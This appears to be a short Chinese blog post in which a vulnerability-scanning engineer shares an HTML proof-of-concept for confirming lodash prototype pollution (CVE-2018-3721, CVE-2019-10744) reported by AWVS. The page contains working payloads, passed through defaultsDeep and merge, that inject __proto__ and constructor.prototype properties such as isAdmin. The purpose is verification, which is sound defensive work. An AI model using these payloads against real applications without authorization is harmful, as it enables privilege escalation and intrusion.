太原网站建设注意站长之家关键词查询
作为一名漏扫攻城狮,时不时会在AWVS中看到lodash这个漏洞,但是我只管导出报告,该怎么验证呢?
验证POC
下面就是用于验证的POC,把这个html中的src进行修改为扫描的网站中的lodash.min.js然后浏览器打开
<!DOCTYPE html>
<html>
<head><title>Lodash 原型污染测试</title><!-- 加载 Lodash --><!-- 这里修改src中的链接 --><script src="https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js"></script>
</head>
<body><script>// 测试代码const payload = '{"constructor": {"prototype": {"lodash": true}}}';_.defaultsDeep({}, JSON.parse(payload));if ({}.lodash === true) {alert("⚠️ 漏洞存在!\n你的 Lodash 版本存在原型污染风险 (CVE-2018-3721, CVE-2019-10744)");} else {alert("✅ 安全!\n你的 Lodash 版本已修复注入漏洞");}</script><script>// 测试代码const maliciousPayload = JSON.parse('{"__proto__": {"isAdmin": true}}');_.merge({}, maliciousPayload);// 检查是否污染成功if ({}.isAdmin === true) {alert("⚠️ 漏洞存在!\nObject.prototype 已被污染,isAdmin=true");} else {alert("✅ 安全!\n未检测到原型污染");}</script>
</body>
</html>
展示效果
